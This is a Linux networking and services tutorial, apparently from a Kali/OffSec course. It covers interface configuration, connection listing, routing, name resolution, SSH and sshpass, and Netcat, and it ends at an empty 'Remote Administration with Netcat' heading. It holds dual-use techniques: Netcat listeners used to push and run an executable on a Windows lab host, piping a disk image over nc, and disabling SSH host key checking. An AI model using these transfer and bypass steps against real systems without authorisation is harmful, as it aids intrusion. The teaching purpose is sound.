Linux Networking & Services

Essential Networking Utilities & Enumeration

ifconfig or ip addr

$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 08:00:27:6b:9f:b4 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
       valid_lft 85996sec preferred_lft 85996sec
    inet6 fe80::a00:27ff:fe6b:9fb4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

Now, let's take a look at the chunks of information in the command output above. An important interface to recognize and get started with is the lo interface. lo stands for loopback, a software interface used to test the local host's network functionality.

The default IP address assigned to this interface is 127.0.0.1, also known as localhost. This address is not routable on the internet and only pertains to the host itself - not the network. Any traffic sent to this interface is routed back to the same machine, which makes it useful for hosting internal resources locally.

The next interface shown in the above output is eth0, short for ethernet interface. This is the cabled connection. Linux systems utilize a device-and-number schema; in this case, this is the first ethernet interface. The numbers for the interfaces start at 0, which means that if another ethernet interface was added, it would display as eth1. This concept also applies to wireless interfaces, such as wlan: the first wireless interface would be displayed as wlan0. When you run the commands on your host, the interfaces shown may be different. The interface naming scheme covered in this module is not the only one available on Linux; depending on the Linux flavor, the default naming of the interfaces may vary.

The IP address of the host is defined next to the word inet in both utilities. ip addr shows the netmask in CIDR notation. The MAC address is shown next to the word 'ether.' The MAC address is the physical hardware address of the NIC in the host. This is burned into the chip, so this is an address that cannot be changed. This value is 6 bytes in length. In Linux, this can be seen with colon (:) delimiters separating each byte value. Each of the byte values is represented in hexadecimal. If you don't know what this means, that's ok. We'll cover hex in the 'Cryptography' portion of this course. For now, just know that the MAC address is a physical address that cannot be changed - like an IP address can be - and that the value of the MAC address is 6 bytes in length.

To configure the network interfaces, the GUI can be leveraged or the /etc/network/interfaces file can be modified. In various situations, it may be important to change the IP address of your host: for example, when the network you are connecting to does not have a DHCP server, when the network is local and hard-coded for configuration purposes, to ensure that your IP remains the same, or to switch between networks if they coexist within the same physical space.

Working with the GUI isn't always an option. Often, using the Linux Terminal is a quicker and more practical way to make configuration changes to a Linux system. Most Linux systems don't use a GUI interface. Let's take a look at how to configure a network interface through the command line.

In the Linux Terminal, let's take a look at the /etc/network/interfaces file.

$ cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

This is the original content of the /etc/network/interfaces file. Notice that there isn't a reference to eth0. This is managed by the NetworkManager by default, so writing to the /etc/network/interfaces file will override the default management and use the configuration settings specified. We can modify this file to configure a network interface by adding the following lines to the file.

allow-hotplug [interface]
iface [interface] inet static
      address [IP]
      netmask [Netmask]
      gateway [Default_Gateway]
$ cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

allow-hotplug eth0
iface eth0 inet static
      address 192.168.1.254
      netmask 255.255.255.0
      gateway 192.168.1.1

If we run 'ip addr' again, we will still have the same IP address as before our change. In the case of my host, the IP will remain as 10.0.2.15. To have the configuration changes we made take effect, we will need to take down the interface and bring it back up.

$ sudo ifdown eth0
[sudo] password for kali:

$ sudo ifup eth0

$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:6b:9f:b4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.254/24 brd 192.168.1.255 scope global eth0
       valid_lft forever preferred_lft forever

Active Connections and Neighbors (netstat -natup, ss, arp -en)

$ netstat -natup
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 10.0.2.15:53292         72.21.91.29:80          ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:53296         72.21.91.29:80          ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:48488         13.224.42.64:443        ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:58074         142.250.189.10:443      ESTABLISHED 2363/x-www-browser
tcp        0      0 10.0.2.15:41852         172.217.5.195:80        ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:55376         44.227.61.45:443        ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:50094         52.40.9.225:443         ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:36702         13.224.42.4:443         ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:36704         13.224.42.4:443         ESTABLISHED 2363/x-www-browser  
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -            

Now, there are many connections made from our host. There are a few important TCP states that we'll need to cover. In the example above, ESTABLISHED indicates an active connection. CLOSE_WAIT means that the remote end has shut down and the host is waiting for the socket to close. TIME_WAIT is when the socket is waiting after closing to handle packets still in the network. LISTEN is when the host is listening for incoming connections. SYN_SENT means the socket is actively attempting to establish a connection; this may indicate a firewall issue, as there is an attempt to establish communication but nothing was received in response to that initial SYN request.

ss is the replacement for netstat and is the default on most newer Linux distributions. This may result in netstat not being available. The options we used for netstat are the same for ss. The output also looks very similar.

$ ss -natup
Netid             State              Recv-Q             Send-Q                          Local Address:Port                              Peer Address:Port             Process                                                
udp               UNCONN             0                  0                                     0.0.0.0:68                                     0.0.0.0:*                                                                       
tcp               ESTAB              0                  0                                   10.0.2.15:42498                           44.241.251.147:443               users:(("x-www-browser",pid=5445,fd=124))             
tcp               ESTAB              0                  0                                   10.0.2.15:53566                              72.21.91.29:80                users:(("x-www-browser",pid=5445,fd=133))             
tcp               ESTAB              0                  0                                   10.0.2.15:48764                             13.224.42.64:443               users:(("x-www-browser",pid=5445,fd=111))             
tcp               ESTAB              0                  0                                   10.0.2.15:48654                             13.224.42.85:443               users:(("x-www-browser",pid=5445,fd=105))             
tcp               ESTAB              0                  0                                   10.0.2.15:48658                             13.224.42.85:443               users:(("x-www-browser",pid=5445,fd=127))             
tcp               ESTAB              0                  0                                   10.0.2.15:48656                             13.224.42.85:443               users:(("x-www-browser",pid=5445,fd=123))   

Connections coming in from or going out to other networks are very useful to identify. This can lead to understanding interconnecting services (services or programs that work together), utilizing pivot points (hosts in a network that can be used to gain access to other parts of the network), discovering internal services (such as local web servers), and even identifying any ports that are listening on a host. This information can also be used to get an idea of any firewall rules (rules that allow and/or disallow network traffic).
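
As a quick illustration of the point about listening ports, both utilities can limit their output to listening sockets only. A minimal sketch (the listening services will differ from host to host): -t restricts the output to TCP, -l shows only listening sockets, -n keeps addresses numeric, and -p displays the owning process.

$ sudo netstat -tlnp

$ sudo ss -tlnp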

Remote connections - or even connections to network ports - are not the only valuable pieces of network information. Learning about arp (Address Resolution Protocol) is the beginning of understanding how Layer 2 attacks work. The arp utility shows the machines on the local network that the host has communicated with at Layer 2 of the OSI model, as recorded in its ARP cache.

$  arp -en
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   4a:56:10:68:7a:8f   C                     eth0
192.168.1.67             ether   3c:16:4e:6b:57:e3   C                     eth0

The above output shows the default gateway (router) at 192.168.1.1 and one other device at 192.168.1.67 that is on the local network.
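
On newer distributions, the standalone arp utility may not be installed by default. The ip utility exposes the same neighbor table and can be used as a rough equivalent (the output lists each neighbor's IP address, interface, MAC address as lladdr, and cache state):

$ ip neigh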

Routing and Network Troubleshooting (route, traceroute, ping)

Understanding where network traffic is going is very important in determining what can and cannot be accessed. As we covered in the Networking Topic, routes are determined by routers on the network. Although it is the job of the routers to ultimately direct the network traffic to the destination, a host must be configured to use that router as a gateway to the end network. We'll get a listing of routes by entering the 'route' command.

$ route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         10.0.2.2        0.0.0.0         UG    0      0        0 eth0
10.0.2.0        0.0.0.0         255.255.255.0   U     0      0        0 eth0

According to the output, a default route exists that will go to the router at 10.0.2.2. The default route could also be represented as 0.0.0.0. Much like the netstat and ss utilities, the -n option can be added to keep the network values from being translated from numerical format into symbolic host names. The Destination field shows where the packets are going; in the case of the default route, any traffic that falls outside of the other defined routes will go to that router. The destination is displayed as a network IP. The Genmask field corresponds with the Destination field to define what hosts would be in this network. In this case, any traffic going to the 10.0.2.0/24 network (a Genmask of 255.255.255.0, written as /24 in CIDR notation) will go out the eth0 interface (Iface field). The Flags field shows that the routes are up (U) and one of them is a gateway (G). Keep in mind that routes don't necessarily need to correspond with the addressing of our host. The route command shows the routing table that is used to tell the host where to direct traffic based on the destination IP.

To add a route out a specific interface: sudo ip route add 10.13.37.0/24 dev eth1. To route through a specific gateway instead, the via keyword is used, and the gateway IP must be reachable from the host.
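
As a minimal sketch, assuming the 10.0.2.2 router from the routing table above is also the path to the 10.13.37.0/24 network (substitute your own gateway), the route would be added through it and then verified:

$ sudo ip route add 10.13.37.0/24 via 10.0.2.2 dev eth0

$ ip route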

Another useful utility in troubleshooting network connections is traceroute. Traceroute sends packets with an increasing TTL (time to live), starting at 1; each router that drops a packet when the TTL expires reports back to the originating host with an ICMP Time Exceeded message, revealing each hop (router) along the path. This is ideal when determining how many router hops are between a host and the target. It is also used to determine where a point of failure may be on a network. Each hop is a router routing the traffic to the next point in the path to get to our end goal. In this case, the goal is to reach the server that holds offensive-security.com. With that, let's run a traceroute on offensive-security.com.

$ traceroute offensive-security.com
traceroute to offensive-security.com (192.124.249.5), 30 hops max, 60 byte packets
 1  10.0.2.2 (10.0.2.2)  0.499 ms  0.471 ms  0.693 ms
 2  192.168.1.1 (192.168.1.1)  2.778 ms  3.851 ms  4.923 ms
 3  072-031-137-017.res.spectrum.com (72.31.137.17)  16.763 ms  15.757 ms  15.746 ms
 4  071-046-012-011.res.spectrum.com (71.46.12.11)  16.726 ms  17.880 ms  17.869 ms
 5  bundle-ether32.orld31-car2.bhn.net (72.31.188.150)  20.930 ms  29.556 ms  18.828 ms
 6  072-031-067-254.res.spectrum.com (72.31.67.254)  27.446 ms 072-031-220-138.res.spectrum.com (72.31.220.138)  24.700 ms  19.269 ms
 7  072-031-067-218.res.spectrum.com (72.31.67.218)  21.485 ms 072-031-220-136.res.spectrum.com (72.31.220.136)  19.317 ms 072-031-067-216.res.spectrum.com (72.31.67.216)  20.454 ms
 8  0.xe-2-2-1.pr0.atl20.tbone.rr.com (66.109.9.138)  21.440 ms
 bu-ether44.tustca4200w-bcr00.tbone.rr.com (66.109.6.128)  25.735 ms 0.xe-2-2-1.pr0.atl20.tbone.rr.com (66.109.9.138)  26.698 ms
 9  66.109.5.131 (66.109.5.131)  25.416 ms  29.801 ms  26.884 ms
10  ae4.cr6-mia1.ip4.gtt.net (208.116.217.205)  35.165 ms  36.093 ms  36.080 ms
11  et-0-0-17.cr8-mia1.ip4.gtt.net (213.200.113.150)  31.964 ms  31.951 ms et-0-0-31.cr8-mia1.ip4.gtt.net (89.149.133.226)  30.952 ms
12  * * *
13  * * *
14  * * *
15  * * *
16  * * *
17  * * *
18  * * *
19  * * *
20  * * *
21  * * *
22  * * *
23  * * *
24  * * *
25  * * *
26  * * *
27  * * *
28  * * *
29  * * *
30  * * *

Name Resolution

Name resolution is the translation of human-readable names into IP addresses. It is much easier to remember something like kali.org than to remember 35.185.44.232. Sometimes, this name resolution functionality on a network will be broken and force us to use the IP instead of the name. This section will cover some critical components in the Linux system to configure name resolution on the host (whether that is to reach out to a server or to be handled locally on the machine).

The name translation mechanism is typically handled by what is called a DNS (Domain Name System) server. This is a server that takes the human-readable name, searches a table for that name, and then points requests for that name to the IP related to it - similar to how we look up a name in a phone book to return a phone number. With respect to Linux networking, we will identify the files responsible for pointing to a DNS (Domain Name System) server and the local files responsible for name resolution. To begin, let's look at the /etc/resolv.conf file. The following example was taken from a default installation of Kali. The provided Kali host may appear different.

$ cat /etc/resolv.conf
domain offensive-security.com
search offensive-security.com
nameserver 192.168.1.1
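
With a nameserver configured, a lookup can be tested from the command line with the host utility, which queries the configured DNS server directly. A quick example (only the A record is shown here; additional output is trimmed):

$ host kali.org
kali.org has address 35.185.44.232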

If a lookup is done for a name that does not specify the domain, the domain entry will be used. In this case, let's suppose that a browser is open and the user enters https://www. Since the domain was not specified in this browser search, the domain entry of offensive-security.com will be added to this search, separated by a period. This will translate to https://www.offensive-security.com/. Keep in mind that the domain entry in the example given is actually a root domain, so the translation happens in full and the site is opened.

If the domain entry is not in the configuration, the search entry will be used. There can only be one value for the domain entry, whereas the search line can have a list of domains to auto-resolve.

Just as the name was resolved by the domain entry, the same would be true in the case of the search entry line. The domain entry will take priority, so having both of these lines is redundant. If there was a need to auto-resolve to multiple domains, the search entry line should be used and the domain entry line removed. An example of this could be as follows.

$ cat /etc/resolv.conf
search offensive-security.com kali.org
nameserver 192.168.1.1

In the event the search entry line is configured as shown above, a lookup for the short name tools will first check whether a tools subdomain exists at offensive-security.com (tools.offensive-security.com). If it is not found there, it will try the next entry and search for tools.kali.org.

I'll return the /etc/resolv.conf file back to the default configuration before continuing forward.

$ cat /etc/resolv.conf
domain offensive-security.com
search offensive-security.com
nameserver 192.168.1.1
nameserver 8.8.8.8

If the first DNS server fails to resolve a name to an IP, the second nameserver entry can attempt to resolve it. Adding more nameserver entries may be useful for resolving internal resources, as well. When the need for name resolution doesn't require a full DNS server, the /etc/hosts file can be configured to do name resolution.

$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

The first column is the IP address, and the second column is the name that will resolve to the IP. Notice that localhost is provided in two locations: the IPv4 section as 127.0.0.1 and the IPv6 section as ::1. More name entries can be provided on the same line as the IP address. An example of adding 'me' to the 127.0.0.1 IP is as follows.

$ cat /etc/hosts
127.0.0.1       localhost me
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

After this change, if we ping -c 2 me, it resolves to 127.0.0.1.

Let's discuss how that happens. The order of name resolution is handled by the /etc/nsswitch.conf (Name Service Switch) file. Let's take a look at this file.

$ cat /etc/nsswitch.conf
# /etc/nsswitch.conf
#
# Example configuration of GNU Name Service Switch functionality.
# If you have the `glibc-doc-reference' and `info' packages installed, try:
# `info libc "Name Service Switch"' for information about this file.

passwd:         files systemd
group:          files systemd
shadow:         files
gshadow:        files

hosts:          files mdns4_minimal [NOTFOUND=return] dns
networks:       files

protocols:      db files
services:       db files
ethers:         db files
rpc:            db files

netgroup:       nis

The first column is the service, and the second column is the way this service is handled. In the case of the hosts service, it is handled first by local files, then mdns4_minimal, and lastly dns. The mdns4_minimal entry is a multicast DNS resolver that handles names ending with the .local TLD. If the name being looked up doesn't end with .local, resolution moves on to the normal dns source. Based on this, hostname lookups should first reference the /etc/hosts file that was covered previously.
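
A quick way to confirm this order is the getent utility, which resolves names through the same Name Service Switch configuration. For example, the following lookup should be answered by the files source (/etc/hosts) before any DNS query is made:

$ getent hosts localhost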

Now, configuring name resolution on a local host should be within your grasp. This can help when a site auto-resolves to a name when a different name - or even an IP - was used initially. It can also make working with commonly used servers much easier. You should be able to help resolve DNS pointer issues when a local host cannot resolve a name, as well.

Common Clients (SSH, SCP, SSHPASS)

SSH (Secure Shell Protocol) is a client/server protocol that allows for secure communications between two hosts. This communication is encrypted over the network, unlike telnet (a similar but unencrypted utility). SSH is commonly used to gain remote access into another host to either use or administer it. SSH works on TCP port 22 by default. It is a protocol that requires a form of authentication, whether that be a standard username/password or a public/private key pair. Let's begin looking at the general usage of ssh. In order for you to be able to follow along, let's start a local ssh server on the Kali host. Your output will look slightly different than what is shown below.

$ sudo systemctl start ssh
[sudo] password for kali: 
                                                                                                                     
$ sudo systemctl status ssh
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Mon 2021-07-12 06:59:17 MST; 8s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 1327 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 1328 (sshd)
      Tasks: 1 (limit: 4631)
     Memory: 2.0M
        CPU: 19ms
     CGroup: /system.slice/ssh.service
             └─1328 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Jul 12 06:59:17 kali systemd[1]: Starting OpenBSD Secure Shell server...
Jul 12 06:59:17 kali sshd[1328]: Server listening on 0.0.0.0 port 22.
Jul 12 06:59:17 kali sshd[1328]: Server listening on :: port 22.
Jul 12 06:59:17 kali systemd[1]: Started OpenBSD Secure Shell server.

Oftentimes, an SSH server will be hosted on a port other than the default. To find out how to change this, let's take a look at the /etc/ssh/sshd_config configuration file. Note that this is not the /etc/ssh/ssh_config file. The /etc/ssh/sshd_config file is for the ssh daemon process (the server process), whereas the /etc/ssh/ssh_config configuration file is for the ssh client.

$ cat /etc/ssh/sshd_config
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Include /etc/ssh/sshd_config.d/*.conf

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
---
Output trimmed
---

$ 

As shown in the output, the Port line is commented out by default. Let's uncomment this line, and change the port value to 2222.
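
The file can be opened with any text editor using sudo. After the edit, the relevant line should read as follows:

$ grep '^Port' /etc/ssh/sshd_config
Port 2222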

Despite the change to the Port line, the ssh server is still available on port 22. Based on the configuration, this is not how the service should work. The issue here is that the ssh service daemon was not restarted. Let's restart the ssh service now.

$ sudo systemctl restart ssh

Now that the service is restarted, let's try to access the ssh server on the default port again.



$ ssh kali@localhost
ssh: connect to host localhost port 22: Connection refused

This is expected behavior of the ssh server. The server should be hosted on port 2222, so let's add the -p option to specify the port we want to connect to.

$ ssh kali@localhost -p 2222

An important directory for ssh is the .ssh directory that gets created in a user's home directory.

The first time an ssh connection is made to a host, the client (our host) will ask if we are sure we want to make the connection. When yes (or the server's fingerprint itself) is entered, our host will store the information so it can recognize the server next time.
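
The prompt looks roughly like the following (the key type and fingerprint are specific to the server being contacted, so yours will differ):

$ ssh kali@localhost -p 2222
The authenticity of host '[localhost]:2222 ([::1]:2222)' can't be established.
ED25519 key fingerprint is SHA256:<server fingerprint>.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:2222' (ED25519) to the list of known hosts.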

Let's go into this directory and see what's in it.

$ cd .ssh

/.ssh$ ls
known_hosts

/.ssh$ cat known_hosts
|1|86RAJY3ztUa3zofzR2kK4R7oRPo=|K9hLsa9qpHg9kVcwjreC7IUr53c= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPQ3hiy42Gd1W442sy5QR+A2vhnp/xrrUn6c6X22Vl/W6437n1WuAVXHQW2gAi8Kj5q0+YmtPz/9YW5Uo4HYMmQ=
|1|wKSu7ICJF/lJuJrQBsxJ5b3a394=|28di0i+KppGoRVluQ2wCNu1V5bw= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPQ3hiy42Gd1W442sy5QR+A2vhnp/xrrUn6c6X22Vl/W6437n1WuAVXHQW2gAi8Kj5q0+YmtPz/9YW5Uo4HYMmQ=

/.ssh$

As we found, there is a file called known_hosts inside the ~/.ssh directory. This is what the connection prompt was adding to the Kali host when we accepted the connection. Right now, the entries are hashed, so we cannot tell which host each line refers to just by reading the file. This behavior is controlled in the client configuration file, /etc/ssh/ssh_config. Let's look at the value that controls this.

/.ssh$ tail /etc/ssh/ssh_config
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
#   UserKnownHostsFile ~/.ssh/known_hosts.d/%k
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

Let's change this value to no, clear the stored file, and try the connection again. Now, when we read the known_hosts file, we can understand more information about what connection each line refers to.

/.ssh$ cat known_hosts
[bandit.labs.overthewire.org]:2220,[176.9.9.172]:2220 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPQ3hiy42Gd1W442sy5QR+A2vhnp/xrrUn6c6X22Vl/W6437n1WuAVXHQW2gAi8Kj5q0+YmtPz/9YW5Uo4HYMmQ=

/.ssh$

The benefit of hashing the known_hosts file is that, in the event of a host compromise, an attacker would have a harder time gaining information about the remote systems that are being accessed from the host.

In the listing above, the first field is the connection destination and port. Since this was reached using the human-readable name (canonical name), it also records the IP address and port that name translated to. The next field shows the key algorithm used to identify this host; in the case of the example, it is the Elliptic Curve Digital Signature Algorithm with SHA-256 (ecdsa-sha2-nistp256). The last field is the remote host's public key, from which the key fingerprint is derived. All of these fields put together identify the remote host in the connection.

This helps prevent eavesdropping or a rogue device by accounting for these pieces of information along with the key value. Sometimes an internal network can have a change in a host's IP that will affect the fingerprint of the known host. This can also happen in a lab environment.

When ssh warns that an attack may be happening, there are two ways to get around the error: 1. remove the known_hosts file (or the entry for that server in the file), or 2. add the -o StrictHostKeyChecking=no option to the ssh command. Remember that this file is a security mechanism to prevent an unauthorized host from eavesdropping on network traffic. In real-world practice, this mechanism should not be bypassed.
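
For reference, a single stale entry can be removed without deleting the whole file by using ssh-keygen with the -R option (the host below is just an example; use the name, or the [name]:port form, exactly as it was used for the connection):

$ ssh-keygen -R "[localhost]:2222"

Alternatively, the check can be relaxed for a single connection:

$ ssh -o StrictHostKeyChecking=no kali@localhost -p 2222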

Instead of changing a global configuration file that affects all users on a system, we'll look at a file that may be more relevant to a separate user account. This file is ~/.ssh/config. This is read before the /etc/ssh/ssh_config file. It is a user-defined file to handle the client configuration for a host, all hosts, or even exclude hosts. Since this is a user-defined file, it will not exist by default. Let's take a look at creating this file for the example given for bandit.labs.overthewire.org.

/.ssh$ ls -al
total 16
drwx------  2 kali kali 4096 Jul 13 03:18 .
drwxr-xr-x 19 kali kali 4096 Jul 13 03:18 ..
-rw-------  1 kali kali   75 Jul 13 03:18 config
-rw-r--r--  1 kali kali  430 Jul 13 03:16 known_hosts

/.ssh$ cat config
Host bandit
        HostName bandit.labs.overthewire.org
        User bandit0
        Port 2220
                  
kali@kali:/.ssh$

Now that an entry for bandit was made in the ~/.ssh/config file, these settings will be used whenever the bandit alias is given to the ssh command. It is also important to note that this file must have 0600 (-rw-------) permissions on it. Let's run the ssh command against the alias.

/.ssh$ ssh bandit
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit0@bandit.labs.overthewire.org's password:

SSH can also be used to remotely copy files, through a utility called SCP (Secure Copy Protocol). For this example, we'll shift back to the local SSH server. Let's go into the Kali user's home directory and start the SSH service again.

The syntax for scp is very similar to the cp command, except the location of the file is going to have User@host:remote-file-path.
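
A minimal sketch of that syntax, copying a file up to the local server and back down again (the paths are just placeholders; if the server is still listening on port 2222, add -P 2222 - note the capital P for scp):

$ scp /etc/hosts kali@localhost:/tmp/hosts-copy

$ scp kali@localhost:/tmp/hosts-copy ./hosts-copy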

The last thing we'll go over in the ssh portion of this section is sshpass. This utility is designed to supply the ssh password in the command execution, rather than have to manually enter it in at the prompt. This is useful in that an ssh session can be opened through a script and not require the interaction of a user. Despite the usefulness of this utility, there are severe security drawbacks. Before we get into the negatives of using sshpass, let's go over how it works, including how to install it.
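
If sshpass is not already present on the system, it can be installed from the distribution's repositories:

$ sudo apt install sshpass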

$ sshpass -p 'bandit0' ssh bandit
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

Linux bandit.otw.local 5.4.8 x86_64 GNU/Linux
---
Output trimmed
---
  Enjoy your stay!

bandit0@bandit:~$ exit

/.ssh$

The ssh connection was automatically authenticated with the provided password. Now that the functionality of sshpass has been covered, let's look at two reasons why we may choose not to use this utility in a production environment. The first is the command history. If a user on a host is compromised, the history command can show the latest commands that were executed by that user. This can be used by an attacker to identify user credentials and other remote systems that are accessible, and can even lead to full-system control by means of privilege escalation. Remember, in the Linux module of this course, the history of user commands was found by reading the ~/.zsh_history file. The history command does the same thing for the current user. Let's take a look at the latest history of the kali user, now.

kali@kali:~$ history
---
Output trimmed
---
 1008  ssh bandit
 1009  sshpass bandit0 bandit
 1010  clear
 1011  sshpass -p 'bandit0' ssh bandit

/.ssh$

In the listing above, we can find the password to the bandit host alias in plaintext. An attacker could use this information to also gain access to the remote host. The second reason is very similar: an attacker could read the password in plaintext if this utility is used in a script. Having passwords in plaintext in any file on a system is bad practice, so embedding them in a script should be avoided.

Netcat (nc)

Netcat, first released in 1995(!) by Hobbit, is one of the "original" network penetration testing tools and is so versatile that it lives up to the author's designation as a hacker's "Swiss army knife". The clearest definition of Netcat is from Hobbit himself: a simple "utility which reads and writes data across network connections, using TCP or UDP protocols."

Connecting to a TCP/UDP Port

As suggested by the description, Netcat can run in either client or server mode. To begin, let's look at the client mode.

We can use client mode to connect to any TCP/UDP port, allowing us to check whether a port is open or closed, read a banner from the service listening on that port, and interact with a network service manually.

Let's begin by using Netcat (nc) to check if TCP port 110 (the POP3 mail service) is open on one of the lab machines. We will supply several arguments: the -n option to skip DNS name resolution; -v to add some verbosity; the destination IP address; and the destination port number:

$ nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3) open
+OK POP3 server lab ready <00003.1277944@lab>

The output above tells us several things. First, the TCP connection to 10.11.0.22 on port 110 (10.11.0.22:110 in standard nomenclature) succeeded, so Netcat reports the remote port as open. Next, the server responded to our connection by "talking back to us", printing out the server welcome message and prompting us to log in, which is standard behavior for POP3 services.

Let's try to interact with the server:

$ nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3) open
+OK POP3 server lab ready <00004.1546827@lab>
USER offsec
+OK offsec welcome here
PASS offsec
-ERR unable to lock mailbox
quit
+OK POP3 server lab signing off.
$

Listening on a TCP/UDP Port

Listening on a TCP/UDP port using Netcat is useful for network debugging of client applications, or otherwise receiving a TCP/UDP network connection. Let's try implementing a simple chat service involving two machines, using Netcat both as a client and as a server.

On a Windows machine with IP address 10.11.0.22, we set up Netcat to listen for incoming connections on TCP port 4444. We will use the -n option to disable DNS name resolution, -l to create a listener, -v to add some verbosity, and -p to specify the listening port number:

nc -nlvp 4444

Now that we have bound port 4444 on this Windows machine to Netcat, let's connect to that port from our Linux machine and enter a line of text:

$ nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
This chat is from the linux machine

Our text will be sent to the Windows machine over TCP port 4444 and we can continue the "chat" from the Windows machine:

C:\Users\offsec> nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.0.22] from (UNKNOWN) [10.11.0.4] 43447
This chat is from the linux machine

This chat is from the windows machine

Transferring Files with Netcat

Netcat can also be used to transfer files, both text and binary, from one computer to another. In fact, forensics investigators often use Netcat in conjunction with dd (a disk copying utility) to create forensically sound disk images over a network.
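
As a rough sketch of that dd technique (the device name, IP address, and port here are examples only, and a real forensic workflow would also hash the image to verify its integrity), the collecting machine listens and redirects the stream to a file, while the machine being imaged pipes the dd output into Netcat. On the collecting machine (10.11.0.4 in this sketch):

$ nc -nlvp 4444 > disk.img

On the machine being imaged:

$ sudo dd if=/dev/sda | nc -nv 10.11.0.4 4444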

To send a file from our Kali virtual machine to the Windows system, we initiate a setup that is similar to the previous chat example, with some slight differences. On the Windows machine, we will set up a Netcat listener on port 4444 and redirect any output into a file called incoming.exe:

C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...

On the Kali system, we will push the wget.exe file to the Windows machine through TCP port 4444:

$ locate wget.exe
/usr/share/windows-resources/binaries/wget.exe

$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [10.11.0.22] 4444 (?) open

The connection is received by Netcat on the Windows machine as shown below:

C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
connect to [10.11.0.22] from (UNKNOWN) [10.11.0.4] 43459
^C
C:\Users\offsec>

Notice that we have not received any feedback from Netcat about our file upload progress. In this case, since the file we are uploading is small, we can just wait a few seconds, then check whether the file has been fully uploaded to the Windows machine by attempting to run it:

C:\Users\offsec> incoming.exe -h
GNU Wget 1.9.1, a non-interactive network retriever.
Usage: incoming [OPTION]... [URL]...

We can see that this is, in fact, the wget.exe executable and that the file transfer was successful.

Remote Administration with Netcat

